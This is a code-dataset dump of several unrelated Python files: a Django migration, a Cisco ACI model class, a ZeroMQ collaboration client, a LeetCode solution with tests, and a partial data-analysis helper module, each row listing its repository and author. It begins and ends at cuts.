    # NOTE(review): assumes bucket 0 corresponds to 512B — confirm against
    # get_hist.hsize's expectations.
    units = {}
    base = 512
    for i in range(1 + max(hist.keys())):
        units[i] = get_hist.hsize(base)
        base = base << 1
    # Output: "<label>\t<bucket>\t<count>".
    for (i, v) in hist.items():
        print "%s\t%d\t%d" % (units[i], i, v)
| [
"mchen@cs.stonybrook.edu"
] | mchen@cs.stonybrook.edu |
faee502e77cbc063c0611c552d915c8f9c8f4ed2 | 5dab7cc91892d02bb0fc23672bec6eaea2291a15 | /posts/migrations/0003_post_view_comment_count.py | 62a65319132e7532b3bca1080e1fc485532cb823 | [] | no_license | HyungJunKimAlbert/src | 75f52b8a40e6c1fa38c7cb446314d0f255c144f0 | f02fa4bf7e52f45da4b891f76d7c0a1c0d6afb74 | refs/heads/master | 2022-05-26T09:13:56.817102 | 2020-04-26T14:54:33 | 2020-04-26T14:54:33 | 259,046,728 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 386 | py | # Generated by Django 2.2.1 on 2020-04-25 10:44
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 2.2.1: adds an integer view/comment counter
    # (default 0) to the Post model.

    dependencies = [
        ('posts', '0002_post_featured'),
    ]

    operations = [
        migrations.AddField(
            model_name='post',
            name='view_comment_count',
            field=models.IntegerField(default=0),
        ),
    ]
| [
"hjkim1568@naver.com"
] | hjkim1568@naver.com |
4be510286a64309365e96715a1c1baddce168127 | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/comp/accessp.py | 6214ab713e8f774ee7c5499f70f913487eac8f0d | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 5,062 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class AccessP(Mo):
    """Abstract managed object 'compAccessP' ("Abstraction of Access Profile").

    Auto-generated ACI model metadata ("written by zen warriors, do not
    modify!"): the class-level ``meta``/``prop`` statements below mirror the
    APIC class schema and should not be hand-edited.
    """

    meta = ClassMeta("cobra.model.comp.AccessP")

    # --- class-level metadata flags ---
    meta.isAbstract = True
    meta.moClassName = "compAccessP"
    meta.moClassName = "compAccessP"
    meta.rnFormat = ""
    meta.category = MoCategory.REGULAR
    meta.label = "Abstraction of Access Profile"
    meta.writeAccessMask = 0x11
    meta.readAccessMask = 0x11
    meta.isDomainable = False
    meta.isReadOnly = False
    meta.isConfigurable = True
    meta.isDeletable = True
    meta.isContextRoot = False

    # --- containment / inheritance relationships ---
    meta.childClasses.add("cobra.model.fault.Delegate")

    meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))

    meta.parentClasses.add("cobra.model.vmm.DomP")

    meta.superClasses.add("cobra.model.naming.NamedObject")
    meta.superClasses.add("cobra.model.pol.Obj")
    meta.superClasses.add("cobra.model.pol.Def")

    meta.concreteSubClasses.add("cobra.model.vmm.UsrAccP")

    meta.rnPrefixes = [
    ]

    # --- property definitions (one PropMeta per attribute) ---
    prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop._addConstant("deleteAll", "deleteall", 16384)
    prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
    prop._addConstant("ignore", "ignore", 4096)
    meta.props.add("childAction", prop)

    prop = PropMeta("str", "descr", "descr", 5579, PropCategory.REGULAR)
    prop.label = "Description"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 128)]
    prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
    meta.props.add("descr", prop)

    prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
    prop.label = "None"
    prop.isDn = True
    prop.isImplicit = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    meta.props.add("dn", prop)

    prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
    prop.label = "Name"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 64)]
    prop.regex = ['[a-zA-Z0-9_.:-]+']
    meta.props.add("name", prop)

    prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
    prop.label = "Name alias"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 63)]
    prop.regex = ['[a-zA-Z0-9_.-]+']
    meta.props.add("nameAlias", prop)

    prop = PropMeta("str", "ownerKey", "ownerKey", 15230, PropCategory.REGULAR)
    prop.label = "None"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 128)]
    prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
    meta.props.add("ownerKey", prop)

    prop = PropMeta("str", "ownerTag", "ownerTag", 15231, PropCategory.REGULAR)
    prop.label = "None"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 64)]
    prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
    meta.props.add("ownerTag", prop)

    prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
    prop.label = "None"
    prop.isRn = True
    prop.isImplicit = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    meta.props.add("rn", prop)

    prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop._addConstant("created", "created", 2)
    prop._addConstant("deleted", "deleted", 8)
    prop._addConstant("modified", "modified", 4)
    meta.props.add("status", prop)

    # Deployment Meta
    meta.deploymentQuery = True
    meta.deploymentType = "Ancestor"
    meta.deploymentQueryPaths.append(DeploymentPathMeta("DomainToVmmOrchsProvPlan", "Provider Plans", "cobra.model.vmm.OrchsProvPlan"))

    meta.deploymentQueryPaths.append(DeploymentPathMeta("ADomPToEthIf", "Interface", "cobra.model.l1.EthIf"))

    meta.deploymentQueryPaths.append(DeploymentPathMeta("DomainToVirtualMachines", "Virtual Machines", "cobra.model.comp.Vm"))

    meta.deploymentQueryPaths.append(DeploymentPathMeta("DomainToVmmEpPD", "Portgroups", "cobra.model.vmm.EpPD"))

    def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
        # Abstract class: no naming properties of its own.
        namingVals = []
        Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"rrishike@cisco.com"
] | rrishike@cisco.com |
d51d2bd4f6706b5327c9c09a4defd7d39ba47239 | 2d740bc48b9a4ca54941966dc6e1be6d8b8e0fc3 | /collab_protocol/python/collab_client.py | c0c22dbfaada5721eb89a0b5ec48b4cb47dc63ad | [] | no_license | dengjunquan/phase3-hurdle | 571bc23e267ecf0607230c62f82de7b0af3d9532 | b9a95abdf4d0bd291d5477542e40e2278e587dee | refs/heads/master | 2021-09-22T22:23:55.208173 | 2018-08-28T21:34:35 | 2018-09-17T18:33:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,027 | py | #!/usr/bin/env python
# encoding: utf-8
from itertools import izip
import logging
import logging.config
import os
import random
import signal
import socket
import struct
import sys
import time
import zmq
import registration_pb2 as reg
import collaboration_pb2 as collab
from argparse import ArgumentParser
from argparse import ArgumentDefaultsHelpFormatter
# Map from log-level names (as they appear in config files / CLI options)
# to the logging module's numeric level constants.
LOG_LEVELS = {"DEBUG":logging.DEBUG,
              "INFO":logging.INFO,
              "WARNING":logging.WARNING,
              "ERROR":logging.ERROR,
              "CRITICAL":logging.CRITICAL}
def ip_int_to_string(ip_int):
    '''
    Render a 32-bit integer IP address as a dotted-quad string
    '''
    packed = struct.pack('!L', ip_int)  # network byte order, unsigned long
    return socket.inet_ntoa(packed)
def get_all_subfields(msg_descriptor, prefix_name="", prefix_num="",
                      current_depth=0, max_depth=None):
    '''
    Recursively walk a protobuf message descriptor and collect, for every
    field (including nested sub-message fields), its fully-qualified name and
    its fully-qualified field-number path.

    Returns two parallel lists of strings:
      names: "top_level_message_name.sub_message_name.sub_sub_message_name"
      ids:   "top_level_message_id.sub_message_id.sub_sub_message_id"
    '''
    # Stop descending once the optional recursion limit is reached.
    if max_depth is not None and current_depth >= max_depth:
        return [], []

    names = []
    ids = []

    # Visit every field of this message; record it, then recurse into any
    # sub-message it defines.
    for field in msg_descriptor.fields:
        qualified_name = "{}.{}".format(prefix_name, field.name)
        qualified_num = "{}.{}".format(prefix_num, field.number)
        names.append(qualified_name)
        ids.append(qualified_num)

        nested = field.message_type  # None/falsy for scalar fields
        if nested:
            child_names, child_ids = get_all_subfields(nested,
                                                       qualified_name,
                                                       qualified_num,
                                                       current_depth + 1,
                                                       max_depth)
            names += child_names
            ids += child_ids

    return names, ids
def make_message_name_to_id_map(top_level_message_descriptor, top_level_message_name):
    '''
    Build a dict mapping every fully-qualified message field name to its
    dotted field-number ID, both derived automatically from the compiled
    protocol buffer descriptor.
    '''
    names, ids = get_all_subfields(msg_descriptor=top_level_message_descriptor,
                                   prefix_name=top_level_message_name,
                                   prefix_num="0")

    # The two lists are parallel, so pairing them gives the name -> id map.
    return dict(zip(names, ids))
def make_my_supported_message_ids(msg_map):
    '''
    Build the list of supported message IDs advertised in the Hello message.

    Note: this deliberately covers only a subset of the informational
    declaration message; msg_map (name -> ID) is used for readability.
    '''
    supported_keys = (
        "collaborate.hello",
        "collaborate.hello.my_dialect",
        "collaborate.hello.my_network_id",
        "collaborate.informational_declaration",
        "collaborate.informational_declaration.statement_id",
        "collaborate.informational_declaration.my_network_id",
        "collaborate.informational_declaration.performance",
        "collaborate.informational_declaration.performance.scalar_performance",
    )
    return [msg_map[key] for key in supported_keys]
def parse_args(argv):
    '''
    Parse command line options and return them as a plain dict.

    If argv is given it is appended to sys.argv before parsing (matching the
    original main() contract); otherwise sys.argv is used as-is.
    '''
    if argv is None:
        argv = sys.argv
    else:
        sys.argv.extend(argv)

    # Build the parser; ArgumentDefaultsHelpFormatter shows defaults in --help
    cli = ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter)
    cli.add_argument("--server-ip", default="127.0.0.1", help="IP address of Collaboration Server")
    cli.add_argument("--server-port", default=5556, type=int, help="Port the server is listening on")
    cli.add_argument("--client-ip", default="127.0.0.1", help="IP address this client is listening on")
    cli.add_argument("--client-port", default=5557, type=int, help="Port the client listens to for messages from the server")
    cli.add_argument("--peer-port", default=5558, type=int, help="Port the client listens to for peer-to-peer messages")
    cli.add_argument("--message-timeout", default=5.0, type=float, help="Timeout for messages sent to the server or peers")
    cli.add_argument("--log-config-filename", default="collab_client_logging.conf",
                     help="Config file for logging module")

    # Return the parsed namespace as a dictionary keyed by dest name
    return vars(cli.parse_args())
class CollabClient(object):
    '''
    Top level object that runs a very simplistic client. This is not likely to be performant
    for any appreciable amount of messaging traffic. This code is an example of how to
    interact with the server and parse peer messages, but use at your own risk if this is
    included in competition code.

    NOTE(review): the module uses ``from itertools import izip`` and several
    dict.keys() idioms, so this code appears to target Python 2 — confirm
    before running under Python 3.
    '''

    def __init__(self, server_host="127.0.0.1", server_port=5556,
                 client_host="127.0.0.1", client_port=5557,
                 peer_port=5558, message_timeout=5.0,
                 log_config_filename="logging.conf"):
        '''
        Store endpoint configuration, set up logging, and build the
        message-type -> handler dispatch tables. No sockets are opened here;
        see setup().
        '''

        # set up logging
        logging.config.fileConfig(log_config_filename)
        self.log = logging.getLogger("collab_client")

        self.server_host = server_host
        self.server_port = server_port
        self.client_host = client_host
        self.client_port = client_port
        self.peer_port = peer_port

        # convert IP address from string to packed bytes representation
        self.client_ip_bytes = struct.unpack('!L',socket.inet_aton(self.client_host))[0]

        # maximum keepalive period; None until the server's Inform message sets it
        self.max_keepalive = None

        # being late is expensive so building in a buffer.
        # we multiply our computed initial keepalive timer value by this scale factor
        # to build in some margin in our reply time
        self.keepalive_safety_margin = 0.75
        self.keepalive_counter = None
        self.my_nonce = None

        # initialize a statement id counter
        self.statement_counter = 1

        # peers keyed by integer IP; values are dicts with ip_address/ip_string/socket
        self.peers = {}

        # This sets up a handler for each type of server message I support
        self.server_msg_handlers = {
            "inform":self.handle_inform,
            "notify":self.handle_notify,
        }

        # This sets up a handler for each top level peer message I support
        self.peer_msg_handlers = {
            "hello":self.handle_hello,
            "informational_declaration":self.handle_informational_declaration,
        }

        # This sets up a handler for each Declaration message type I support
        self.declaration_handlers = {"performance":self.handle_performance}

        # This sets up a handler for each Performance message type I support
        self.performance_handlers = {"scalar_performance":self.handle_scalar_performance}

        # This controls how long the client will try to send messages to other endpoints before
        # throwing a warning and giving up
        self.message_timeout = float(message_timeout)

        # initialize my message ID map used for readability
        self.msg_map = make_message_name_to_id_map(collab.Collaborate.DESCRIPTOR,
                                                   "collaborate")

        # store of the list of message IDs I support
        self.my_supported_msg_ids = make_my_supported_message_ids(self.msg_map)

    def setup(self):
        '''
        Set up initial zeromq connections.

        The client needs to start up its main listener for incoming messages from the server
        and a separate socket to handle messages coming from peers. It will also set up a
        poller for both sockets to allow it to service server and peer connections without
        blocking
        '''
        self.z_context = zmq.Context()
        self.poller = zmq.Poller()

        # initialize the listening socket for the server
        self.listen_socket = self.z_context.socket(zmq.PULL)
        self.poller.register(self.listen_socket, zmq.POLLIN)
        self.listen_socket.bind("tcp://%s:%s" % (self.client_host,self.client_port))
        self.log.info("Collaboration client listening on host %s and port %i",
                      self.client_host, self.client_port)

        # initialize the listening socket for peers
        self.peer_pull_socket = self.z_context.socket(zmq.PULL)
        self.poller.register(self.peer_pull_socket, zmq.POLLIN)
        self.peer_pull_socket.bind("tcp://%s:%s" % (self.client_host,self.peer_port))
        self.log.info("Collaboration client listening for peers on host %s and port %i",
                      self.client_host, self.peer_port)

        self.log.info("Connecting to server on host %s and port %i",
                      self.server_host, self.server_port)

        # initialize the push socket for sending registration and heartbeat messages to
        # the server
        self.server_socket = self.z_context.socket(zmq.PUSH)
        self.poller.register(self.server_socket, zmq.POLLOUT)
        self.server_socket.connect("tcp://%s:%i" % (self.server_host, self.server_port))
        self.log.debug("Connected to server")

    def teardown(self):
        '''
        Close out zeroMQ connections and zeroMQ context cleanly
        '''
        self.log.debug("Shutting down sockets")

        # unregister from the poller and close the server listening socket
        self.poller.unregister(self.listen_socket)
        self.listen_socket.close()

        # unregister from the poller and close the server push socket
        self.poller.unregister(self.server_socket)
        self.server_socket.close()

        # unregister from the poller and close the peer listening socket
        self.poller.unregister(self.peer_pull_socket)
        self.peer_pull_socket.close()

        # cleanup any resources allocated for each peer
        # NOTE(review): cleanup_peer mutates self.peers while this iterates
        # peer_id_list; safe on Python 2 where keys() returns a list copy.
        peer_id_list = self.peers.keys()
        for peer_id in peer_id_list:
            self.cleanup_peer(peer_id)

        self.z_context.term()
        self.log.info("shutdown complete")

    def send_with_timeout(self, sock, message, timeout):
        '''
        Try to send a message with some timeout to prevent a single endpoint from
        making me wait forever on a response
        '''
        tick = time.time()
        tock = time.time()

        success = False

        # check if an endpoint is open and ready to accept a message. If the endpoint
        # is ready, send the message. If we reach the timeout before an endpoint appears to be
        # ready, give up on the message and log an error
        # NOTE(review): poller.poll() is called with no timeout argument, so a
        # single iteration can block longer than the requested timeout if no
        # registered socket becomes ready — verify against the zmq docs.
        while tock-tick < timeout and success == False:
            self.log.debug("Trying to send message")
            socks = dict(self.poller.poll())
            if sock in socks and socks[sock] == zmq.POLLOUT:
                self.log.debug("Socket ready, sending")
                sock.send(message.SerializeToString())
                success = True
            else:
                self.log.warn("Tried to send message, endpoint is not connected. Retrying")
                time.sleep(1)
            tock=time.time()

        if not success:
            self.log.error("Could not send message after %f seconds", timeout)
        else:
            self.log.debug("Message sent")
        return

    def list_peers(self):
        '''
        Generate a list of peers I know about (their integer IP addresses)
        '''
        peer_addresses = [val["ip_address"] for key, val in self.peers.items()]
        return peer_addresses

    def add_peer(self, ip):
        '''
        I've been informed of a new peer. Add it to the list of peers I'm tracking
        and send it a Hello message.

        :param ip: peer IP address as an unsigned 32-bit integer
        '''
        self.log.info("adding peer %i", ip)
        ip_string = ip_int_to_string(ip)
        self.log.debug("trying to connect to peer at IP: %s and port %i",
                       ip_string, self.client_port)

        # create a socket for my new peer
        peer_socket = self.z_context.socket(zmq.PUSH)
        peer_socket.connect("tcp://%s:%i" % (ip_string,self.peer_port))

        # add socket to poller
        self.poller.register(peer_socket, zmq.POLLOUT)

        # store off new peer
        self.peers[ip] = {"ip_address":ip,
                          "ip_string":ip_string,
                          "socket":peer_socket}

        peer_addresses = self.list_peers()
        self.log.debug("list of peers: %s",peer_addresses)

        # send a Hello message to the new client
        self.send_hello(self.peers[ip])
        return

    def cleanup_peer(self, ip):
        '''
        Release any resources allocated for the peer associated with the given IP
        '''
        # close socket to old peer; LINGER 0 drops unsent messages immediately
        peer_socket = self.peers[ip]["socket"]
        self.poller.unregister(peer_socket)
        peer_socket.setsockopt(zmq.LINGER, 0)
        peer_socket.close()
        self.log.info("Removing peer %s", ip_int_to_string(ip))
        del self.peers[ip]
        return

    def handle_inform(self, message):
        '''
        I received an inform message. Set up my keepalive timer and store off the peers
        '''
        self.log.info("Received Inform message")
        inform = message.inform

        # store off the nonce and max keepalive timer value the server told me
        self.my_nonce = inform.client_nonce
        self.max_keepalive = inform.keepalive_seconds

        # store off my neighbor contact info
        neighbors = inform.neighbors
        self.log.debug("Inform message contents: %s", message)
        for n in neighbors:
            # skip my own address in the neighbor list
            if n != self.client_ip_bytes:
                self.add_peer(n)
        return

    def handle_notify(self, message):
        '''
        The server has given me an update on my peers list. Handle these updates
        '''
        self.log.info("Received Notify message")
        neighbors = message.notify.neighbors

        # find new peers
        # check list for new peers. Do initial setup required for any new peers
        for n in neighbors:
            if n not in self.peers and n != self.client_ip_bytes:
                self.add_peer(n)

        # stop tracking peers that have left
        # NOTE(review): relies on Python 2 dict.keys() returning a list copy,
        # since cleanup_peer deletes entries from self.peers during iteration.
        current_peers = self.peers.keys()
        for p in current_peers:
            if p not in neighbors:
                self.cleanup_peer(p)
        return

    def handle_hello(self, message):
        '''
        I've received a hello message from a peer. Right now this only prints the message
        '''
        self.log.info("Received Hello message from peer %i",message.hello.my_network_id)
        self.log.debug("Hello Full Contents: %s",message.hello)
        return

    def handle_informational_declaration(self, message):
        '''
        I've received a declaration from my peer. This doesn't do much right now:
        only Performance payloads are dispatched; the rest are logged as
        unimplemented.
        '''
        statement_id = message.informational_declaration.statement_id
        network_id = message.informational_declaration.my_network_id
        self.log.info("Received declaration message id %i from peer %s",
                      statement_id, ip_int_to_string(network_id))
        self.log.debug("Message full contents: %s", message)

        declaration = message.informational_declaration

        try:
            # this is a simple way to handle declarations that does not account
            # for any associations
            if len(declaration.demand) > 0:
                self.log.warn("Demand messages not implemented")
            if len(declaration.resource) > 0:
                self.log.warn("Resource messages not implemented")
            if len(declaration.performance) > 0:
                handler = self.declaration_handlers["performance"]
                for p in declaration.performance:
                    handler(p)
            if len(declaration.observation) > 0:
                self.log.warn("Observation messages not implemented")
        except KeyError as err:
            self.log.warn("received unknown message type %s", err)

    def handle_performance(self, performance):
        '''
        Message handler for Performance messages: dispatch on the oneof payload
        '''
        self.log.debug("Declaration message was a Performance message")
        try:
            handler = self.performance_handlers[performance.WhichOneof("payload")]
            handler(performance)
        except KeyError as err:
            self.log.warn("received unknown message type %s", err)

    def handle_scalar_performance(self, performance):
        '''
        Message handler for Scalar Performance messages (log-only)
        '''
        self.log.debug("Performance message was a Scalar Performance message")
        self.log.info("Scalar performance was %f",performance.scalar_performance)

    def send_register(self):
        '''
        Generate a register message and send it to the collaboration server
        '''
        self.log.info("sending register message to server")

        # construct message to send to server
        message = reg.TalkToServer()
        message.register.my_ip_address = self.client_ip_bytes
        self.log.debug("register message contents: %s", message)

        # serialize and send message to server
        self.send_with_timeout(sock=self.server_socket,
                               message=message,
                               timeout=self.message_timeout)

    def send_keepalive(self):
        '''
        Generate a keepalive message (echoing the server-assigned nonce) and
        send it to the collaboration server
        '''
        self.log.info("sending keepalive")

        # construct message to send to server
        message = reg.TalkToServer()
        message.keepalive.my_nonce = self.my_nonce
        self.log.debug("keepalive message contents: %s", message)

        # serialize and send message to server
        self.send_with_timeout(sock=self.server_socket,
                               message=message,
                               timeout=self.message_timeout)

    def send_leave(self):
        '''
        Be polite and tell everyone that we are leaving the collaboration network
        '''
        self.log.info("sending leave message")

        # construct message to send to server
        message = reg.TalkToServer()
        message.leave.my_nonce = self.my_nonce
        self.log.debug("leave message contents: %s", message)

        # serialize and send message to server
        self.send_with_timeout(sock=self.server_socket,
                               message=message,
                               timeout=self.message_timeout)

    def send_hello(self, peer):
        '''
        Send a hello message (advertising my dialect and network ID) to my peer
        '''
        self.log.info("sending hello message to peer %s", peer["ip_string"])

        # Create the top level Collaborate message wrapper
        message = collab.Collaborate()

        # add to the supported declaration and performance lists using the extend()
        # method
        message.hello.my_dialect.extend(self.my_supported_msg_ids)

        # set my network ID to my IP address (on the collaboration protocol network)
        message.hello.my_network_id = self.client_ip_bytes

        self.log.debug("Hello message contents: %s", message)

        # serialize and send message to peer
        self.send_with_timeout(sock=peer["socket"],
                               message=message,
                               timeout=self.message_timeout)

    def send_performance(self, peer, scalar_performance):
        '''
        Send a scalar performance declaration to my peer
        '''
        self.log.info("sending performance to peer %s", peer["ip_string"])
        message = collab.Collaborate()
        message.informational_declaration.statement_id = self.statement_counter
        message.informational_declaration.my_network_id = self.client_ip_bytes

        # create a new performance object in the informational_declaration performance list
        # and update it with a new value using the add() method
        performance = message.informational_declaration.performance.add()
        performance.scalar_performance = scalar_performance

        self.log.debug("Performance message contents: %s", message)

        # increment the statement counter
        self.statement_counter = self.statement_counter + 1

        # serialize and send message to peer
        self.send_with_timeout(sock=peer["socket"],
                               message=message,
                               timeout=self.message_timeout)

    def manage_keepalives(self):
        '''
        Keep track of my keepalive counter and ensure I send a new keepalive message to the
        server with some random counter and a safety margin to make sure the server isn't
        hit by too many keepalive messages simultaneously and also to ensure I'm not late
        '''
        tock = time.time()
        elapsed_time = tock - self.tick

        # is it time to send the keepalive?
        # NOTE(review): keepalive_counter is None until the first send; the
        # float >= None comparison only works on Python 2 (it evaluates True
        # there) and would raise TypeError on Python 3 — confirm.
        if elapsed_time >= self.keepalive_counter:
            self.tick = tock
            self.send_keepalive()

            # picking a new keepalive counter at random so the server is
            # less likely to get bogged down by a bunch of requests at once.
            new_count = random.random()*self.max_keepalive

            # building in a fudge factor so we'll always be well below the max
            # timeout
            self.keepalive_counter = new_count * self.keepalive_safety_margin
            self.log.debug("starting new keepalive timer of %f seconds",
                           self.keepalive_counter)
        return

    def run(self):
        '''
        Run the client's event loop.

        This is not expected to keep up with high update rates, only as an example of how
        to send messages and handle messages sent to me
        '''
        self.tick = time.time()
        self.log.info("Sending register message")
        self.send_register()
        last_performance_update = 0

        # arbitrarily chosen update period
        performance_update_period = 20

        while True:

            # manage the keepalive counter. Don't bother until the server
            # tells us what the keepalive max should be
            if self.max_keepalive is not None:
                self.manage_keepalives()

            socks = dict(self.poller.poll())

            if time.time() - last_performance_update > performance_update_period:

                # if it's time to send out a performance update, check if there
                # are any peers. If so, pick one at random and send it an update.
                # NOTE(review): random.choice(self.peers.keys()) requires the
                # Python 2 list-returning keys(); dict_keys is not indexable
                # on Python 3.
                if len(self.peers) > 0:
                    scalar_performance = random.random()
                    peer_id = random.choice(self.peers.keys())
                    self.send_performance(self.peers[peer_id], scalar_performance)
                last_performance_update = time.time()

            # look for a new message from either a peer or the server
            # Polling may not be that efficient, but this is an example of using
            # the code and talking to the server and peers. This is not intended
            # to be a competition ready client.
            if self.listen_socket in socks:
                self.log.debug("processing message from server")

                # get a message off the server listening socket and deserialize it
                raw_message = self.listen_socket.recv()
                message = reg.TellClient.FromString(raw_message)
                self.log.debug("message was %s", message)

                # find and run the appropriate handler
                try:
                    handler = self.server_msg_handlers[message.WhichOneof("payload")]
                    handler(message)
                except KeyError as err:
                    self.log.error("received unsupported message type %s", err)

            # check for new messages from my peers
            elif self.peer_pull_socket in socks:
                self.log.debug("processing message from peer")

                # get a message off the peer listening socket and deserialize it
                raw_message = self.peer_pull_socket.recv()
                message = collab.Collaborate.FromString(raw_message)
                self.log.debug("message was %s", message)

                # find and run the appropriate handler
                try:
                    handler = self.peer_msg_handlers[message.WhichOneof("payload")]
                    handler(message)
                except KeyError as err:
                    self.log.warn("received unhandled message type %s", err)
            else:
                time.sleep(0.5)
def handle_sigterm(signal, frame):
    '''
    Signal handler: translate SIGTERM into KeyboardInterrupt so the main
    loop's shutdown path runs on a graceful termination request.
    '''
    raise KeyboardInterrupt
def main(argv=None):
    '''
    Entry point: parse options, run the client until interrupted, then send a
    Leave message and tear down cleanly.
    '''
    print("Collaboration Client starting, CTRL-C to exit")

    # parse command line args
    options = parse_args(argv)

    client = CollabClient(server_host=options["server_ip"], server_port=options["server_port"],
                          client_host=options["client_ip"], client_port=options["client_port"],
                          peer_port=options["peer_port"],
                          log_config_filename=options["log_config_filename"])
    client.setup()
    try:
        client.run()
    except KeyboardInterrupt:
        print("interrupt received, stopping...")
        try:
            client.send_leave()
        except TypeError as err:
            print("error while shutting down:", err)

    client.teardown()


if __name__ == "__main__":
    main()
| [
"craig.pomeroy.ctr@darpa.mil"
] | craig.pomeroy.ctr@darpa.mil |
9e03554339fbf11a977d749579273a5308ebe17c | 0ba1743e9f865a023f72a14d3a5c16b99ee7f138 | /problems/test_0413_dp.py | b94b4a4005613d47a4b97b5eda809a2ed0f42f15 | [
"Unlicense"
] | permissive | chrisxue815/leetcode_python | d0a38a4168243b0628256825581a6df1b673855c | a33eb7b833f6998972e5340d383443f3a2ee64e3 | refs/heads/main | 2022-06-20T15:09:27.221807 | 2022-06-02T21:55:35 | 2022-06-02T21:55:35 | 94,590,264 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 997 | py | import unittest
import utils
# O(n^2) time. O(n) space. DP.
class Solution:
    def numberOfArithmeticSlices(self, a):
        """
        :type a: List[int]
        :rtype: int

        Count arithmetic slices (length >= 3) by growing every start index
        one element at a time; step[start] caches the run's common difference
        and is invalidated (set to None) once the run breaks.
        """
        n = len(a)
        step = [a[i + 1] - a[i] for i in range(n - 1)]
        total = 0
        # span is the distance between the slice's first and last index.
        for span in range(2, n):
            for start in range(n - span):
                stop = start + span
                if step[start] == a[stop] - a[stop - 1]:
                    total += 1
                else:
                    step[start] = None
        return total
class Test(unittest.TestCase):
    def test(self):
        # Run the solution against every case in the shared JSON fixture.
        for case in utils.load_test_json(__file__).test_cases:
            label = str(case.args)
            actual = Solution().numberOfArithmeticSlices(**case.args.__dict__)
            self.assertEqual(case.expected, actual, msg=label)
# Run the unit tests when executed as a script.
if __name__ == '__main__':
    unittest.main()
| [
"chrisxue815@gmail.com"
] | chrisxue815@gmail.com |
243ac0fbe36422f9fa269aca5648dd83705bf943 | 92162f0d96820c73f03c92b402f7cc3c95823b30 | /HelpfulFunctions.py | 47606cc01398ce0526fce8dc6e4824f0bab22dab | [] | no_license | TrevorDemille/Simple-Analysis-App | f59ec56c653ae5f4196a8e317048d976d78bb604 | e9d1ab29138ceb36f24e186cba0cf5314feee5dc | refs/heads/master | 2021-01-12T10:16:13.041863 | 2016-12-13T22:57:25 | 2016-12-13T22:57:25 | 76,405,125 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,401 | py | import numpy as np
import matplotlib.pyplot as plt
import glob
import os
from pH import *
from Parser import *
#
#Written by Trevor Demille, Summer 2016, Goldner Biophysics Group
"""
List of functions necessary/helpful in the analysis of Fluorimeter and Dynamic Light Scattering data.
Data is all taken to either be in the CSV or TXT format.
Some conditions on the plotting of data such as the concentrations, iterations, and legends must be maually
edited in the code here.
A copy of this file as well as the Parser.py an pH.py python files must be saved in the program files directory where
the master storage for local python libraries is kept. (ie C_drive-->Program Files-->Python2.7)
"""
#Function to import and parse out data from text files
def loadData(fileName, fileNum):
    '''
    Import and parse data from text files.

    fileName is a glob pattern relative to the hard-coded data directory
    (e.g. "directory/subdirectory/*.txt"); the pattern must describe the end
    of the filenames to match. fileNum is the number of files expected in
    the directory; the returned list has one numpy array per matched file.
    '''
    path1 = 'C:/Users/tdemille/Desktop/UMA/Sublime/Python/Text Files for pH'
    inputPath = os.path.join(path1, fileName)
    #
    all_txts = glob.iglob(inputPath)
    print(all_txts)
    #
    # Pre-size the result list and fill one slot per matched file.
    columnFiles = [None] * fileNum
    for slot, dataFile in enumerate(all_txts):
        columnFiles[slot] = np.loadtxt(dataFile)
    return columnFiles
def solvepH(R, S):
    """Compute and print the pH for a single fluorescein ratio measurement.

    Parameters
    ----------
    R : float
        Measured intensity ratio.
    S : float
        Standard deviation of the ratio.

    Returns
    -------
    The value reported by :func:`pH.get_pH` (also printed to stdout).
    """
    # BUG FIX: the original function ended with ``self.Rentry.delete(0,'end')``
    # and ``self.Sentry.delete(0,'end')`` — leftovers from a GUI class method.
